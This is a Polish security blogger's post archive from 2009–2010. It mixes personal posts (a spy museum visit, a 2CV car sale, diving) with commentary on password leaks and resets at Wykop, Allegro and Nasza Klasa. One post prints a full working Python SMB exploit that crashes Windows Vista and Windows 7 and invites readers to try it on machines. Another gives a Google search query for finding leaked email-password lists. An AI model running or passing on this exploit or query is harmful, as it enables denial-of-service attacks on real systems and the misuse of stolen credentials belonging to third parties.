Piotr Konieczny

Felieton dla PRESS-a

Mon, 22 Feb 2010 19:04:37 +0100

Parę miesięcy temu PRESS poprosił mnie o napisanie paru słów o tym, w jaki sposób korzystam z sieci i które z serwisów internetowych "lubię" najbardziej. To chyba pierwszy tekst dla prasy, w którym starałem się pisać jak najmniej o bezpieczeństwie ;-) Okazało się to cholernie trudne i dlatego w tekście znajdziecie wskazówki jak obejść blokadę stron WWW w pracy i jak "wylifehackingować" sobie tańsze bilety lotnicze lub zniżkę na samochód.

Najbardziej "dumny" jestem z obserwacji, do której doszedłem w trakcie pisania: "jeśli w Polsce lub na świecie dzieje się coś istotnego, informacja o tym sama mnie znajduje". Niestety, czy tego chce, czy nie... o podobnym problemie pisał niedawno Paweł.

Podsumowując; gdyby kogoś interesowało, dlaczego nie czytam Onetu (i reszty polskich portali), co mam w Google Readerze, gdzie tanio kupić elektronikę w sieci, przez jaki serwis słucham muzyki i czym synchronizuje iPhone'a z laptopem -- zapraszam do kiosków po lutowy numer PRESS-a.

P.S. Okazuje się, że kontakt z redaktorami może jednak być miły i na poziomie. Pod warunkiem, że nie są to redaktorzy Dziennika ;>

Atak którego nie było...

Thu, 26 Nov 2009 16:50:25 +0100

Przedczoraj na Niebezpieczniku opublikowaliśmy informację o forum, na którym ktoś umieścił hasła użytkowników (głównie polskiego internetu) do wielu, naprawdę wielu portali.

Wczoraj Sylwia Czubkowska z Dziennik.pl poprosiła mnie o komentarz do sprawy. Na pytanie (pisownia oryginalna):

Jak Państwo oceniają co to za włamanie, znaczy się po co kraść hasła w potem je upubliczniać?

odpowiedziałem:

Najprawdopodobniej chodzi tu o wzbudzenie respektu wśród społeczności phisherow/crackerow i zamanifestowanie swoich możliwości, co oczywiście może przełożyć się na realne zyski. Jeśli cracker jest wiarygodny (często postuje duże ilości *działających* haseł) to do niego w pierwszej kolejności zgłoszą się spamerzy szukajacy botnetu do wynajęcia.

A oto, co zrobił z poniższej wypowiedzi redaktor Dziennika:

Od wczoraj proszę o przywrócenie oryginalnego brzmienia mojej wypowiedzi -- bezskutecznie. Pani Sylwia podzieliła co prawda moje odczucia, bo sama nie jest zadowolona z tego artykułu (podobno redaktor wprowadził poprawki do jej tekstu). Dowiedziałem się, że artykuł zostanie poprawiony zgodnie z moimi sugestiami m.in. dot. niepoprawnego zastąpienia crackera "hakerem" ...i został, na coś takiego:

...nie wiem, jak ktoś mógł *ponownie* dopuścić się takiej fuszerki!? Na kolejnego e-maila jeszcze nie dostałem odpowiedzi. Może obstawimy, na co teraz zmienią? :>

P.S.
Zauważcie, że Niebezpiecznik.pl nigdzie nie napisał, że wyciek haseł nastąpił z polskich serwisów... Napisaliśmy, że hasła internautów do wielu polskich serwisów zostały przechwycone, najprawdopodobniej przez trojana. Dziennikarze jednak widzą co chcą i od wczoraj na niektórych serwisach pojawiają się wiadomości sugerujące zmasowany i OMG WTF atak na polskie portale...

Ktoś jeszcze chce zaprzeczyć, że dziennikarze nie są piątą władzą? Jeśli większość artykułów z dziedzin na których się nie znam jest tak rzetelna, to chyba przestaję czytać prasę...

P.S.2
Z racji ogromnego ruchu, Niebezpiecznik szuka sponsora, który wyłoży kasę na hosting :>

Niebezpieczne wiadomości

Thu, 19 Nov 2009 19:59:24 +0100

...czyli wieści z pierwszych dwóch tygodni Niebezpiecznika.

Wydaje mi się, że projekt Niebezpiecznik.pl został przyjęty dość dobrze... Po dwóch tygodniach od startu mamy:

• 846 stałych czytelników przez RSS,
• 63 stałych czytelników przez e-mail
• i dokładnie 95 obserwatorów na Blipie.

Tyle osób nas już odwiedziło:

Większość weszła bezpośrednio:

I spędziła u nas ok. 3 min.:

Jakie tematy poruszył Niebezpiecznik?

Jeśli jeszcze nas nie czytasz, to zobacz co straciłeś ;) Poniżej lista TOP10 postów:

• Fotoradar Injection
opisujący sprytny pomysł na wykiwanie fotoradaru ;)

• SMS - Spoofing numeru nadawcy
tłumaczymy jak podszywać się pod dowolny numer telefonu komórkowego (i oczywiście jak takie oszustwo wykrywać)

• Przetestuj swojego antywirusa
kilka testów, które sprawdzą jak szczelnie twój program antywirusowy chroni twój komputer

• [VIDEO] atak Drive-By download
prezentacja zainfekowania komputera poprzez stronę WWW

• [VIDEO] Zamek otwierany pukaniem
pokaz niekonwencjonalnego zamka do drzwi...

• [FOTO] Jak strzec PIN-u swojej kobiety
dowcipny demotywator z pogranicza humoru i bezpieczeństwa ;-)

• Konkurs ;-)
nasz "hackme" z nagrodami.

• 114 skryptów przydatnych przy testach penetracyjnych
zbiór narzędzi pomagających wykonać test penetracyjny

• Sekrety firm antywirusowych
kilka branżowych sekretów -- czy zagrażają naszemu bezpieczeństwu?

• iPhone i nagie fotki
czyli jak znaleźć modelkę po informacjach zawartych w EXIF

P.S. Do pierwotnej ekipy dołączyły też dwie nowe osoby, ale i tak czekamy na twój artykuł ;-)

O północy rusza Niebezpiecznik.pl

Sat, 31 Oct 2009 19:49:44 +0100

Kilka miesięcy temu wraz z paroma znajomymi doszliśmy do wniosku, że w Polsce nie istnieje żaden dobry vortal poświęcony wyłącznie zagadnieniom związanym z bezpieczeństwem komputerowym... Po paru piwach, postanowiliśmy to zmienić :)

Dziś, o północy, nastąpi premiera serwisu Niebezpiecznik.pl.

W końcu dla serwisu o tak mrocznej tematyce nie ma lepszej premiery jak przełom Halloween i Św. Zmarłych... ;-)

Czym jest Niebezpiecznik.pl?

Niebezpiecznik będzie dostarczał informacji i praktycznych porad ze świata bezpieczeństwa komputerowego. Ma służyć jako platforma komunikacji i poszerzania wiedzy zarówno dla specjalistów ds. bezpieczeństwa, pentesterów, administratorów danych osobowych, jak i zwykłych ludzi, zainteresowanych tematyką bezpiecznego korzystania z komputera i internetu. Już teraz można go zasubskrybować przez:

•RSS (pełna treść dostępna po północy)
•newsletter
•Blip
•Twitter

Zapraszam do współpracy nad Niebezpiecznikiem. Zwłaszcza tych, którzy udzielają się na tagu #security na Blipie.

Co z grinblogiem?

Co się zaś tyczy tego bloga — on nie umiera. Dalej będę tu pisał i o swoich prywatnych przemysleniach i o bezpieczeństwie, chociaż nie ukrywam, że większość rzeczy związanych z security będę wpychał raczej na Niebezpiecznika — dlatego, jesli chcecie być na czasie, zachęcam do subskrybcji Niebezpiecznika RSS / newsletter / Blip / Twitter.

Wystawa Szpiegów w Warszawie (zdjęcia)

Wed, 28 Oct 2009 19:10:27 +0100

Wczoraj, zachęceni stroną-reklamą, wybraliśmy się z M. na Wystawę Szpiegów do Pałacu Kultury i Nauki. Wystawę można podsumować jednym słowem: rozczarowanie.

W internecie wystawa prezentuje się zachęcająco; świetna strona WWW, w programie zwiedzania zagadki, łamigłówki i interaktywne eksponaty... Już mieliśmy nadzieję na przeżycia na miarę odwiedzonego rok temu Toronto Science Center... ale rzeczywistość okazała się bardzo "warszawska": tj. szara, betonowa i nudna ;p Wspomniane na strone "interaktywne zabawy" polegały na zapamiętaniu: tego co jest w walizce i odpowiedzeniu na komputerze na 5 pytań (nazwa zabawy na stronie WWW: kontrola bagażu bez wpadki), zapamiętaniu tego co jest w dowodzie agenta i odpowiedzeniu na komputerze na 5 pytań (nazwa zabawy na stronie WWW: szkolenie szpiega), doklejeniu sobie wirtualnych wąsów na komputerze (nazwa zabawy na stronie WWW: zmiana tożsamości), zobaczeniu się na monitorze (nazwa zabawy na stronie WWW: wykrywanie kamer). Łamania kodów i szyfrów nie zauważyłem, była za to pocztówka z napisem wykonanym farbą widzialną tylko w UV (dziwne, że można było ją zobaczyć gołym okiem)...

Muzea w Polsce zawsze kojarzyły mi się z nudą i ciszą... rozwydrzone wycieczki gimnazjalistów, biegające po Pałacu Kultury i Nauki zmieniły moje zdanie. Teraz polskie muzea są chyba tylko nudne...

Mimo wszystko, prezentuje poniżej co ciekawsze zdjęcia (można je było robić legalnie, bez dodatkowej opłaty, i to moim zdaniem jedyny plus tej wystawy):

jedna z agencji wywiadowczych ma w logo znak Batmana? :-)

tu trzeba było znaleźć ukrytą kamerę...

zestaw łamaków do otwierania samochodów. Urzekł mnie podpis: "Krajsler"...

Aparat Leicy umożliwiający robienie zdjęć przy zasłoniętym obiektywie.

Bardzo ukryta kamera.

Zegarki-dyktafony. Ale ciekawsza, moim zdaniem, jest "urwana" ręka ;-)

Było też o Echelonie...

Czego brakuje na tym obrazku?

Jakby ktoś chciał ROT-ować...

Enigma (ani słowem nie wspomniano, że Polacy nie musieli łamać szyfru...)

To obowiązkowo powinno zawisnąć w pociągach IC Kraków-Warszawa

Gołębie pocztowe, zrzucane na spadochronach (albo bez). Robiły zdjęcia i przenosiły je do dowództwa.

Stopa zakładana pod buta, spoofowała odcisk podeszfy

przenośny zestaw narzędzi do przeszukiwania mieszkań...

nurkonapędzacz

pistolet ukryty w wiertarce...

Znów jak w Batmanie - pistolet strzelający drabinką...

Prawie rycerska rękawica, chroni przed dźganiem ;)

noże w wisorku-krzyżyku i monecie

coś dla pań: nóż w szmince i pistolet w pierścionku

telefon w paczce papierosów...

instrukcja CIA dot. materiałów wybuchowych

samochód Jamesa Bonda, BMW, na filmie sterowany z tel. komórkowego (BTW, my właśnie sprzedajemy jeden z samochodów Bonda)

uniwersalny, automatyczny wytrych

CB-Radio w zegarku...

i na koniec, szarość muzeum...

W jakim muzeum ostatnio byliście? Podobało się Wam?

Sprzedam samochód Jamesa Bonda! (Citroen 2CV, 1973, żółty)

Mon, 26 Oct 2009 23:24:53 +0100

Z racji przeprowadzki, chcemy przekazać Kaczuchę w dobre ręce. Szkoda, żeby taka piękność stała w garażu i nikogo nie uśmiechała. Poznajcie ją bliżej:

Oprócz tak niewątpliwych zalet jak manualna klimatyzacja, nożny-ręczny hamulec, czy dźwignia zmiany biegów przy kierownicy, Kaczucha posiada szereg innych, przydatnych funkcji:

* Poprawia humor. Nie tylko jej kierowcy, ale i przechodniom. Dzieci szaleją, dorośli machają, inni kierowcy ustępują pierwszeństwo — można grzać ile wlezie ;-)

* Zwraca pieniądze za bliety parkingowe. Każdy dłuższy postój w mieście to albo nowa maskotka, albo kwiatuchy za wycieraczką. Że nie wspomnę o niezliczonej ilości wzruszających liścików wetkniętych za wycieraczkę :) To z nadwyżką rekompensuje stres związany ze staniem w korkach oraz pieniądze wydane na bilet parkingowy ;)

* Zarabia pieniądze. I to całkiem niezłe. Wynajęcie jej na ślub (2h) to zysk ok. 700PLN - 1000PLN

* To jest samochód Jamesa Bonda!

Wierzcie mi, że ten pościg to tylko ułamek możliwości tego samochodu ;-)

* Jest jak transformer. Jednym ruchem zamienisz ją w seksowne cabrio... A zwinięty dach, oprócz rozwiewania grzywki, daje +100 do lansu i +1000 do zdolności podrywania ;-) Sprawę ułatwia fakt, że przednie siedzenia tworzą kanapę, nie ma między nimi żadnego odstępu...

* Parkuje wszędzie i nie płaci mandatów — z racji jej rozmiarów wszędzie nią zaparkujesz, także w miejscach niedozwolonych. Nawet Policja nie ma serca ukarać jej mandatem ;)

Dane Techniczne

- rocznik 1973
- nowa rama samochodu (niespawana, a jednoczęściowa; odlana na specjalne zamówienie w 2006r.)
- odnowiony i zregenerowany w 2004 roku silnik: 0.4 litra (23KM)
- nowe opony (kupione w październiku 2009r.)
- przebieg: 138000 km
- spalanie: 5l na 100 km
- max. predkość: 110 km/h (ale przecież liczy się styl i klasa ;-)
- przegląd techniczny ważny do 17-tego lipca 2010r.
Kaczucha jest sprawna, ale nie idealna — trzeba ją pokochać z wadami, albo poniższe wady usunąć ;-)

- nie działa wskaźnik paliwa (ale nowego właściciela nauczymy niezbędnej magii, która pozwolina przewidzenie ilości paliwa w baku)
- siedzenia wymagają czyszczenia (zapewne karcher wystarczy, koszt ok. 30PLN, odliczymy od ceny sprzedaży ;)
- w dachu znajdują się niewielkie uszkodzenia (łatane na bieżąco). Wypadałoby dach wymienić lub wpisać w kalendarz regularne sprawdzanie stanu obecnych łat ;)

Masz pytania, chcesz kupić?

Więcej informacji udzielam poprzez e-maila, lub Gadu-Gadu i Jabbera. Wstępnie wyceniliśmy ją na 15 000 PLN (do negocjacji). Kaczucha stacjonuje w Poznaniu. Więcej zdjęć jest tutaj.

Videopost

Thu, 22 Oct 2009 20:31:10 +0200

Jak już kilka osób zauważyło, na stronie Plusa można było (do dzisiaj :>) oglądać materiał dot. "bezpiecznych" haseł, który nagrałem na prośbę lookr.tv jako komentarz do niedawnego wycieku danych z Hotmaila i GMaila. Nie jest to nic, czym warto się chwalić, ale chciałbym wykorzystać okazję i zapytać Was co myślicie o vidcastach? Nie ukrywam, że to wygodniejsza i szybsza metoda przekazywania informacji w stosunku do tradycyjnego postowania (minuty vs. godziny) -- pytanie, czy przekaz jest równie jasny...?

P.S. Trochę przeraża mnie myśl, że nagranie powstało dlatego, że niektórym ludziom ciągle trzeba tłumaczyć jakie powinno być hasło i dlaczego warto posiadać różne hasła do różnych serwisów...

Jak znaleźć listy haseł do e-maili?

Wed, 14 Oct 2009 19:51:03 +0200

Parę dni temu, wszyscy ekscytowali się znalezionymi w sieci listami zawierającymi 20 000 adresów e-mail i haseł do GMaila, Hotmaila oraz AOL. Dziś chciałem sobie ściągnąć taką listę do celów statystycznych, ale wygląda na to, że przez przypadek ułożyłem zapytanie, które zwraca więcej (i bardziej interesujących) list tego typu:

gmail.com hotmail.com 123456 filetype:txt

Co w zapytaniu robi 123456? -- założyłem, że jest to dość popularne hasło i powinno ono wystąpić na większości list tego typu... Można popróbować też z "dupą", "qwerty" i paroma innymi popularnymi hasłami :>

Tym, którzy nie czują się zbyt pewnie w temacie specjalnych operatorów wyszukiwania, polecam mój wykład pt. Google Hacking.

P.S. Prawdopodobnie większość kont z tych list nie będzie działać -- pamiętajcie o tym, że tysiące phisherów miało je przed wami ;) I tak, wiem, że zapytanie można trochę rozbudować, żeby osiągnąć lepsze wyniki — ale to pozostawiam Wam jako pracę domową... ;-)

Nurkowanie w Jaworznie -- koparki :)

Mon, 12 Oct 2009 20:24:57 +0200

fot. Gazeta.pl

W miniony weekend wybraliśmy się z M. do Jaworzna celem zanurkowania w tamtejszym kamieniołomie. Pod wodą znaleźć tam można koparki (takie duuuuże). Dla mnie było to pierwsze nurkowanie, tzw. intro, czyli zejście z instruktorem. Najpierw wypożyczenie sprzętu, potem przebranie się w piankę, naplucie do maski, założenie ołowianego pasa, przykręcenie automatu do butli, butla hop na plecy, płetwy i można skakać do wody :)

Z racji tego, że zbiornik jest sztuczny, przejrzystość wody jest wysoka; 6-7m. Stały dopływ wód gruntowych gwarantuje dobrą temperaturę. Kiedy wczoraj temperatura na zewnątrz wynosiła 13C, w wodzie było 16C... W zbiorniku prawie w ogóle nie ma roślinności, dzięki czemu udało nam się całkiem wyraźnie zobaczyć kilka rybek i koparę ;-) Ponieważ nasz podwodny aparat był padł, zdjęcia powyżej i filmy poniżej ukradliśmy z internetu ;)

Efekt mojego nurkowania jest taki, że zamierzam wybrać się na kurs. Również w Jaworznie (bo zamiast zajęć na basenie, robią je w kamieniołomie ;)

P.S. Myślałem, że pływanie w płetwach jest łatwiejsze...

Zmiana hasła na Allegro (i inne wymuszenia)

Fri, 09 Oct 2009 20:59:14 +0200

Allegro wysłało wczoraj do użytkowników e-maile z prośbą o zmianę hasła:

Nie był to pierwszy tego typu mailing (por. artkuł w DI). Wczorajszy e-mail jest więc zapewne kontynuacją akcji rozpoczętej miesiąc temu.

Mam kilka uwag, co do całego procesu "wymuszania zmiany haseł". Część z nich zaprezentowałem już w poście opisującym współpracę Naszej Klasy z Wykopem, teraz parę słów komentarza do sprawy Allegro:

Security Warning dla użytkowników
- jak to zrobić poprawnie? (case na podstawie Allegro)

1. Linki w e-mailu. Osobiście, uważam, że przesyłanie przez serwis w e-mailu do użytkownika *jakichkolwiek* linków jest złą praktyką. Po pierwsze (i najważniejsze), przyzwyczaja to użytkowników do obecności linków w oficjalnych mailach i zachęca do klikania w nie, co w przypadku phishingu będzie miało opłakane skutki. Doceniam to, że Allegro uczy się na własnych błędach (por. Allegro i phishing) i tym razem nie podało bezpośredniego linku do formularza zmiany hasła, ale niestety, w mailu umieszczono inne linki, a jak wiemy "większość Polaków nie widzi różnicy".

2. Opis tekstowy. W treści e-maila zabrakło mi tekstu opisującego jak po zalogowaniu do serwisu zmienić hasło. Jego brak sprawia, że użytkownik czuje się zagubiony, co jeszcze bardziej zachęca do klikania w linki z sekcji "Przydatne informacje", celem poszukania odpowiedniej informacji.

3. Nowe hasło może być takie jak obecne. Nie byłbym sobą, gdybym nie spróbował zmienić hasła na takie, jakie miałem do tej pory :> Jak się zapewne domyślacie, udało się!

Na szczęscie, zen szybko zareagował na bugreport i wziął się za szukanie winowajcy ;)

...ale dziś dalej można zmieniać hasło na bieżące...

To prowadzi nas do błyskotliwej myśli. Skoro nasze konto zostało wytypowane, jako posiadające niby-słabe hasło, to dlaczego zmiana hasła na takie samo, albo nawet słabsze jest możliwa? Jaki jest cel wymuszenia zmiany hasła, skoro de facto pozwala się użytkownikowi na pozostanie przy swoim starym niby-słabym haśle?

Jest to przykład błedu w logice biznesowej, o której ostatnio pisał rezos. Obstawiam, że w myśl złotej zasady: "ludzie nie lubią zmieniać haseł", większość użytkowników Allegro stworzy swoje nowe hasło poprzez dopisanie 1, lub 2 do starego, albo jak ja, spróbuje je po prostu zmienić na stare...

Dlaczego Allegro zmienia hasła?

W internecie panuje powszechna opinia, że prośba o zmianę haseł podyktowana jest ich wyciekiem. Ja jednak się z nią nie zgadzam, bo posiadacz bazy haseł, wiedząc o akcji, może się spokojnie zalogować na konta użytkowników i złośliwie pozmieniać im hasła na nowe. Tego typu wymuszenie zmiany hasła kiepsko broni przed atakami związanymi z wyciekiem bazy haseł (już lepszy jest reset, vide Nasza-Klasa). A ponieważ wiem, że ludzie pracujący w dziale bezpieczeństwa Allegro są sensowni, nie wierzę, że nie zdają sobie z tego sprawy ;)

Poniżej przedstawiam alternatywną hipotezę, i tylko $DEITY oraz CSO Allegro raczą wiedzieć, czy moje domysły są słuszne... ale pewnie ani jeden ani drugi się nie wypowie ;)

Allegro powstało dawno temu (AFAIR silnik został napisany w piwnicy przez jednego programistę, w tydzień). Domyślam się, że wtedy nie przywiązywano wiele wagi co do jakości i bezpieczeństwa kodu. Nieszyfrowanie haseł użytkowników (albo jakiś cienki XOR) to była normalka, wystarczy wspomnieć tu Gadu-Gadu, czy parę innych internetowych kolosów, które również powstawały w tamtym okresie.

Tak więc Allegro przez lata sobie działa, trzymając w bazie hasła jawnym tekstem, albo jakimś prostym algorytmem symetrycznym. Biznes się rozrasta, a na bezpieczeństwie albo się oszczędza, albo nie ma się dlań czasu, bo trzeba zrobić upgrade tego, na szybko załatać to, zaimplementować tamto, wystartować z tym, które przecież trzeba też zabezpieczyć od zera... itp.

Ryzyko wycieku danych, które przez lata było stosunkowo małe (przez co, zupełnie słusznie, nie opłacało się poświęcać mu wiele czasu i środków). W dobie botnetów i głośnych w mediach wycieków haseł ze znanych w Polsce serwisów (por. sprawa Wykopu), ryzyko jednak odrobinę się powiększa, a jeszcze kontrole GIODO i inne audyty przechodzić trzeba od czasu do czasu... Po udanej migracji na nową infrastrukturę pada więc pomysł zmiany sposobu przechowywania haseł.

Jeśli hasła są w plaintekście, można to zrobić po cichu, masowo i z automatu (i mam nadzieję, że jakiś czas temu Allegro w ten sposób przeszło na hashowanie :P), ale wiele biznesów nie może oprzeć się pokusie przypomnienia swojej marki użytkownikowi pod byle pretekstem. Jak to mówią, każdy powód do mailingu jest dobry ...a taki który pokazuje, że podnosimy bezpieczeństwo danych użytkownika, to nawet powód bardzo dobry. Popatrzcie tylko na Wykop, takiego faila zaliczył, a jednak wszystkie media o nim napisały (ciekawe ile nowych użytkowników sciągnęły wstawki w telewizji i radio, w myśl zasady, że nie ważne co piszą, byle nie przekręcili nazwy serwisu... ;-)

Nawet jeśli powyższe gdybania nie opisują w 100% historii Allegro, myślę, że znajdzie się kilka innych serwisów w Polsce, które idealnie pasują do powyżej sytuacji... Jeśli zauważasz podobieństwa ze swoim startupem, pora wziąć się do roboty.

I na koniec, taka tam nieistotna, ale dająca do myślenia informacja ;)

Równie dający do myślenia jest komentarz Peceta, dotyczący 16-znakowego ograniczenia na nowe hasło a pochodzący z wpisu Paolo.

P.S. A może znacie lepszy powód, dla którego Allegro wymusza zmianę haseł? Jest co najmniej jeden, o którym świadomie nie napisałem... ;)

Mac & Bones (koszulka)

Thu, 01 Oct 2009 20:12:08 +0200

Kontynuując cykl "czwartek z geekowym t-shirtem", dziś przedstawiam wam koszulkę Mac & Bones. Kupiona gdzieś w amerykańskim internecie za 15 USD.

Nasza Klasa zresetowała mi hasło ...bo Wykop jej kazał!

Sat, 19 Sep 2009 11:22:34 +0200

Wykop.pl chyba nie nauczył się niczego na swojej niedawnej wpadce. Wczoraj dostałem takiego e-maila:

Niepokojące w powyższym są dwie rzeczy: 1. Wykop udostępnił moje dane firmie trzeciej (Naszej Klasie), bez mojej zgody (chociaż najprawdopodobniej będą się tłumaczyć, że dla mojego dobra). Najprawdopodobnie był to adres e-mail, ponieważ w obu serwisach miałem inne loginy i hasła. W sumie, zastanawia mnie dlaczego nie wymienili się hashami :> (Nie odpowiadajcie, to pytanie retoryczne). Dobrze, że w Wykopowym profilu nie było pola na numer karty kredytowej, bo czułbym się teraz nieswojo...

2. Nasza Klasa, jak dobra ciocia, zmieniła mi hasło i poprosiła o jego odzyskanie za pomocą standardowego formularza, do którego wklepać trzeba nie tylko swój e-mail, ale i datę urodzenia. Osoby, które przy zakładaniu konta podały "lewą" datę (a kto nie podał?), będą miały 365 problemów :>

Na plus Naszej Klasie można policzyć, że w treści e-maila nie dała linku do "przypomnij hasło" -- wtedy mielibyśmy piękny przykład autophishingu ;) Niestety, z kontaktem do supportu, jak widać, już nie poszło im tak dobrze...

Czy korelacja danych pomiędzy dwoma serwisami może być groźna?

Takie zachowanie w przypadku dwóch, powiedzmy sobie, małoistotnych dla mnie serwisów, w których po prostu miałem konto, jestem w stanie puścić płazem. Ale już ~~korelac~~"wymiana danych" na zasadzie "porozumienia" pomiędzy np. moim bankiem a serwisem http://lubie.przebierac.sie.w.damksie.ciuszki.pl mocno by mnie wkurzyła... (kto wie, co w dzisiejszych czasach wpływa na zdolność kredytową :>)

Niedawno głośno było o naukowcach, którzy zebrawszy dane na temat "przyjaciół" w różnych serwisach społecznościowych, byli wstanie określić, czy dwa konta z różnych serwisów to ta sama osoba...

W temacie korelacji patrz też na przykład z naszego podwórka: blokowanie kont nieletnich na Allegro przy współpracy Naszej Klasy. Szerzej o tym napisał coldpeer w komentarzu nr 8 pod tym wpisem ;)

Genialny Sposób na reklamę?

Całość wygląda trochę jak tandetna akcja reklamowa — Wykop chyba lubi jak jest o nim głośno... Ciekawe czy to znaczy, że będzie popełniał fackupy jeden za drugim?

A może właśnie odkryliśmy sposób na reklamę naszego serwisu wśród użytkowników Naszej Klasy? Dziś zakładam superhiperserwis.pl, jutro wysyłam do NK maila, że mnie zhakowano, źli hackerzy skopiowali bazę serwisu (jakie szczęście, że Policja odzyskała *wszystkie* jej kopie :>), i że wszyscy moi użytkownicy mieli też konto na NK. Następnego dnia NK zmienia wszystkim hasła, wysyłając mailing z nazwą mojego serwisu do milionów Polaków...

P.S. Coraz poważniej zastanawiam się nad założeniem firmy doradczej — taki Risk & Crisis Consulting. Jak widać, polskie firmy (Wykop, Nasza Klasa, a wcześniej Merlin, Allegro) zaczynają popełniać błędy związane z zarządzaniem ryzykiem i bezpieczeństwem — i to normalne — ale z profesjonalną "obsługą incydentu" (w mediach i nie mediach) jest zazwyczaj fatalnie... Są chętni? Pierwszych trzech klientów dostaje darmową obsługę ;)

P.S.2: mcv dodał to do Wykopu, można kopnąć. BTW zawsze rozczulają mnie zakopy z powodem "spam"...

Fuck Google, Ask Me (Koszulka)

Thu, 17 Sep 2009 20:32:20 +0200

...i tym postem otwieram na blogu nowy cykl wpisów, o przewrotym tytule:
"Czwartek z geekowym t-shirtem". Następny t-shirt już za tydzień ;-) PS Kupiłem ją na bazarze w Turcji, za 12USD, utargowawszy 3USD "rabatu" :-) Jestem posiadaczem wielu "informatycznych" koszulek (wszystkie poznacie niebawem), ale żadna z nich nie wzbudza takich entuzjastycznych reakcji wśród przechodniów jak tshirt z napisem "Fuck Google, Ask Me" ;-)

Zawieś Vistę i Windows 7

Tue, 08 Sep 2009 20:43:51 +0200

W sieci pojawił się pierwszy exploit, pozwalający na zdalny atak wymierzony w systemy Windows Vista i Windows 7 (a jak niektórzy twierdzą, najprawdopodobniej i Windows Server 2008). Właściciele XP i Servera 2003 mogą spać spokojnie — te systemy są bezpieczne (przynajmniej w tym przypadku :-)

Atak wykorzystuje błąd w nowym sterowniku obsługującym protokół SMB i jak mówią, pozwala zawiesić komputer ofiary, poprzez wymalowanie na jej ekranie przepięknego B.S.O.D.. Piszę "jak mówią", bo mnie nie udało się wywalić postawionej naprędce Visty Enterpise... Ale może Wam się uda — poniżej kod exploita: #!/usr/bin/python from socket import socket from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

Obrona

Póki co, Microsoft (niespodzianka!) nie udostępnia żadnej łatki. Polecam więc zapobiegawczo wyłączyć obsługę SMB na swoich maszynach, albo przyciąć port 445... na dniach zapewne pojawi się wzmożony ruch na tym porcie.

P.S. Jeśli komuś uda się wywalić jakiegoś Windowsa, klepnijcie komcia z wersją systemu.

Hasła użytkowników Wykop.pl wyciekły

Sat, 05 Sep 2009 21:37:29 +0200

Dziś okazało się, że

~~pół roku~~

kilka tygodni temu* (sic!) z Wykopu udało się ściągnąć kompletną bazę danych (w tym hasła użytkowników). Administracja Wykopu nie wspomniała o tym ani słowa, tłumacząc się teraz dość mętnie "dobrem śledztwa". Nie ma się co dziwić, nikt nie lubi się przyznawać do błędów. Szkoda tylko, że administratorzy Wykopu nie ostrzegli kilkudziesięciu tysięcy swoich użytkowników, że ktoś ma ich hasła i należałoby je zmienić, zwłaszcza w innych serwisach, jeśli (nierozsądnie) wszędzie wykorzystują to samo hasło...

Jak doszło do włamania?

Do wycieku bazy doszło poprzez włamanie nie na główny serwer Wykopu, ale na jedną z deweloperskich (służących do testów) maszyn... Prześledźmy zatem, co poszło nie tak, i jakie błędy popełniła załoga Wykopu.

Mam nadzieję, że ten case-study będzie świetną przestrogą dla wszystkich startupów, a także dobrym wyjaśnieniem tego co się stało, dla tych, którzy nie mają zbyt wielkiej wiedzy w temacie bezpieczeństwa komputerowego i czytając komentarze dotyczące włamania na Wykop.pl, nie wiedzą komu ufać i kto mówi prawdę.

Czego Wykop (i wy) nie powiniście robić

1. Nie trzymaj serwerów deweloperskich na publicznych adresach IP. Naprawdę łatwo można poznać ile (i jakich) adresów IP należy do danej organizacji. Wystarczy odpytać bazę Whois.

2. Filtruj dostęp do usług, które nie są wymagane do działania serwisu. Jeśli ktoś pozna adresy IP należące do Wykopu (patrz punkt 1) może je przeskanować za pomocą chociażby nmapa, aby dowiedzieć się jakie usługi są udostępniane, w których wersjach i czy w którejś z nich wykryto jakieś dziury...
Rozumiem, że SSH, czy FTP mogą znacznie ułatwić testowanie/konfigurację webaplikacji, ale nie powinny one być dostępne dla każdego internauty!. Serwery deweloperskie należy trzymać "za firewallem" - dostęp zewnątrz tylko z tzw. białej listy, przez VPN/SSH.

3. Zmieniaj domyślne hasła (i konfigurację serwera). Bo inaczej spotka Cię kara. Wykop postawił na wygodę - żadnego filtrowania - programiści mogli testować serwis z domu, pociągu, kawiarenki internetowej, a nawet iPhone'a siedząc na kibelku ;) Ale Wykop wygodę zrozumiał dość frywolnie, bo oprócz braku restrykcji w dostępie do serwera, nie ustawiono nawet hasła dla konta administratora bazy danych... i to właśnie doprowadziło do włamania.

Nikt nie musiał odpalać żadnych exploitów lub łamać haseł -- ich po prostu nie było!

4. Nie wrzucaj produkcyjnej bazy na testowy serwer. To jest wielkie no-no. Naprawdę warto poświęcić nawet kilka godzin, aby wygenerować testowe dane. To nic w porównaniu z tym, co może się stać, jeśli przeniesie się oryginalną bazę z serwera produkcyjnego na testowy, czyli luźniej skonfigurowany, i przez to łatwiejszy do zaatakowania, bo często z włączonymi komunikatami błędów i nie tak mocną polityką bezpieczeństwa. To posłało na dno jedną z instytucji finansowych (sprawdzających swoją webaplikację na prawdziwych numerach kart kredytowych swoich klientów), a w przypadku Wykopu umożliwiło pobranie haseł użytkowników.

5. "Posól" hasła użytkowników. Na szczęście, Wykop hasła użytkowników trzymał w postaci hashy SHA1 (w przeciwieństwie do innego dużego i bardziej znanego Polakom polskiego portalu, który swoje hasła trzyma w bazie jawnym tekstem...).
